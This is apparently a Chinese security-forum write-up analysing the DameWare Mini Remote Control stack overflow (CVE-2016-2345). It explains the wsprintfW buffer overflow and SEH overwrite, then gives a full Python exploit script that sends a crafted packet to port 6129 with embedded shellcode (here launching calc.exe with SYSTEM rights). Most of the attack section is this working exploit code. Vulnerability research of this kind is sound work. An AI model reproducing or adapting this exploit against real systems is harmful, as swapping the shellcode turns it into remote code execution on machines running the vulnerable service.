DameWare迷你远程遥控漏洞(CVE-2016-2345) 调试分析

Author:SaFeBuG@i春秋

漏洞相关链接:http://www.freebuf.com/articles/terminal/102204.html

几个重要参数分布图:

D380处为input_buf,即是所发的shellcode包,大小为0x430
F920处为dst_buf,大小0x208
FB28处为format_str,大小为0x92

关键函数wsprintfW最大拷贝值为:0x400。由于该函数为unicode型,故每次拷贝两个字节,循环拷贝0x400次,故总共拷贝0x800 byte。从F920处开始,向下拷贝0x800个字节,导致栈空间全部被覆盖,触发了page fault异常。于是我们可以借此漏洞刻意覆盖SEH首链地址,用pop pop retn 覆盖第一个异常处理函数地址,用eb 06 90 90 覆盖第一个异常处理链表地址,接着就是用我们的布置好的call xxxx 覆盖后面部分。

如下图:

该漏洞只能在本地测试,远程测试的话,需要使用IPv6的ip地址才能成功。

IDA代码段如下;

该函数必须返回非零,下一步才能到达漏洞点。

测试环境:

Windows 7 x86
给出本地测试EXP代码:
local_exp.py

import socket
import sys
import os
import time
import struct
import binascii
import random
  
# windows/exec - 220 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
  
MsgBox = (
"x31xD2x52x68x63x61x6Cx63x89xE6x52x56x64"
"x8Bx72x30x8Bx76x0Cx8Bx76x0CxADx8Bx30x8B"
"x7Ex18x8Bx5Fx3Cx8Bx5Cx1Fx78x8Bx74x1Fx20"
"x01xFEx8Bx4Cx1Fx24x01xF9x42xADx81x3Cx07"
"x57x69x6Ex45x75xF5x0FxB7x54x51xFEx8Bx74"
"x1Fx1Cx01xFEx03x3Cx96xFFxD7")
  
#pading = "A"*(0x20b+0x9) + "B"*(0x225-0x9)
#pading = "A"*(0x20b+0x9) + sc
attack = "x90"*0x10 + MsgBox + "A"*(0x214 - 0x10 - len(MsgBox)) + "B"*(0x162) + "xebx06x90x90"  + "x6dx14x40x00" + "xe8x37xd4xfexff" + "D"*(0xb6-0x4-0x5)
port = 6129
  
#if len (sys.argv) == 2:
# (progname, host ) = sys.argv
#else:
# print len (sys.argv)
# print 'Usage: {0} host'.format (sys.argv[0])
# exit (1)
host = '0:0:0:0:0:0:0:1'
csock = socket.socket( socket.AF_INET6, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
  
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"#csock.send(buf)
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
  
  
buf = struct.pack("I", 0x9c44) #msg type
#buf += pading #payload
buf += attack
#buf += ("%" + "x00" + "c" + "x00")
csock.send(buf)
  
  
print binascii.hexlify(csock.recv(0x4000))
  
csock.close()

SYSTEM级别的calc。

原文地址:http://bbs.ichunqiu.com/thread-13555-1-1.html?from=seebug